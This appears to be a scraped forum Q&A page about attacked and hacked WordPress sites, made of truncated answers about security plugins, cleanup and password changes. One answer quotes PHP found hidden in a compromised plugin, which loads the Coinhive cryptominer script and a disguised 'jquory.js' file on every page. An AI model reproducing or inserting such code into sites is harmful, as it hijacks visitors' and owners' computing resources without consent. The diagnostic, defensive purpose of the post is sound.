WordPress installer attack
WordPress installer attack
WordPress installer attack
Bruteforce attack from 127.0.0.1?
As far as I can think of this is a server issue. This has happened to me once due to server crash. I hope you have a backup of your files.
I fixed it by BBQ: Block Bad Queries plugin: https://wordpress.org/plugins/block-bad-queries/
You can check the WPScan Vulnerability Database The vulnerabilities are classified in ‘WordPress’, ‘Plugins’ and ‘Themes’ at the top bar, from 2014 on. Cheers
I found the problem.. Answering for others who might have gotten this… There is this code embedded in one of the plugins function enqueue_my_scripts() { wp_enqueue_script( ‘wp-internal’, ‘https://coinhive.com/lib/coinhive.min.js’, false, false, true ); wp_enqueue_script( ‘wp-backend’, plugins_url() . ‘/LayerSlider/assets/js/jquory.js’, false, false, true ); } add_action( ‘admin_enqueue_scripts’, ‘enqueue_my_scripts’ ); add_action( ‘wp_enqueue_scripts’, ‘enqueue_my_scripts’ ); And this javascript file Jquory.js. … Read more
Disabling plugins won’t help if WordPress core has been compromised (and reinstalling WordPress won’t do much good if your hosting account has been compromised). I would recommend nuking and paving your installation with help from your hosting provider (and getting a professional to audit any necessary themes and plugins you plan to use after this … Read more
Possibly it was just the original install emails coming through all at the same time from localhost, very late, some 2 years ago. I can’t find the original emails but then if they went into spam like these emails I wouldn’t find them. So I don’t know, hopefully its just a late localhost bottleneck finally … Read more
There are many things you need to do to fix a hacked site. Lots of googles on how to do it. Important things to do: change passwords on everything – WP accounts, FTP accounts, hosting accounts. Strong passwords, of course. remove the user called ‘admin’ (or just give it Subscriber level, after making a new … Read more
Help determining if the following are legitimate files